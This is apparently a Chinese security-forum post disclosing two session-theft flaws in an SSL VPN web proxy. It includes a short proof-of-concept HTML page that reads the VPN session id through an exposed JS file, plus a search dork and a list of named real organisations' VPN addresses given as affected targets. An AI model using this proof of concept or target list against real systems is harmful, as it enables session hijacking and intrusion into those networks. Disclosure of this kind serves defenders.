漏洞
两种方式均可实现 session 盗用,从而进入内网。

1、js 文件含有 session 信息,可实现访问任意网页被盗取 session
如登陆后访问 https://ra.xxxx.net/prx/000/http/localh/an_vpn.js
可以看到sessionid 被写入 js 内容

这样随便访问一个经过构造的网页如,http://10.8.124.38:8888/sec/vpn.hml,网页源码

<script src=https://ra.xxxx.net/prx/000/http/localh/an_vpn.js></script>
<script>
    alert(window._AN_sessionid)
</script>

session 即可被盗走。

2、代理访问网站会携带 vpn 域的 cookie,可实现访问任意网页被盗取 session
登陆代理后访问的地址是 https://ra.xxxx.net/prx/000/http/10.8.124.38:8888/sec/vpn.html,

  • 可以看到把目标网页的内容拼接在模板部分的后面

  • 且所有 cookie 可读写

请求目标网页会带上 vpn 域名的下的cookie:

影响范围
谷歌搜索 https://www.google.com.hk/search?q=inurl%3Aprx%2F000%2Fhttp
部分大型网站:
东华大学 https://vpn.bjtu.edu.cn/prx/000/http/localhost/login/login.html
北京交通大学 https://vpn.bjtu.edu.cn/prx/000/http/localhost/login/login.html
香港航空控制系统 https://web.hkairlines.net/prx/000/http/vpn.hka.net/
海航协同办公平台 https://www.hnagroup.net/prx/000/http/vpnweb.hnair.com/weblinks.htm
中粮集团 https://landvpn.cofco.com/prx/000/http/localhost/login/login.html
长城证券 https://vpn.cgws.com/prx/000/http/localhost/login/download/vpn-guide-for-client1.pdf
上海外国语大学 https://202.121.96.148/prx/000/http/localhost/login
官方网站 https://support.arraynetworks.net/prx/000/http/supportportal.arraynetworks.net/login.html
中国移动 https://emis.chinamobile.com/prx/000/http/sso.hq.cmcc:8080/transvpn/sslvpn.jsp
阿里云 https://vpn.jbp.aliyun-inc.com/prx/000/http/localhost/login
中金财富 https://vpn.china-invs.cn/prx/000/http/localhost/login/index.html
江苏省电力设计院 https://vpn.jspdi.com.cn/prx/000/http/172.17.16.154/vlogin.jsp
用友集团 https://vpn.yonyou.com/prx/000/http/localhost/login/index.html
方正证券 https://vpn.foundersc.com/prx/000/http/18.100.254.97:8080/vpnlogin/vpnlogin/login.action

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖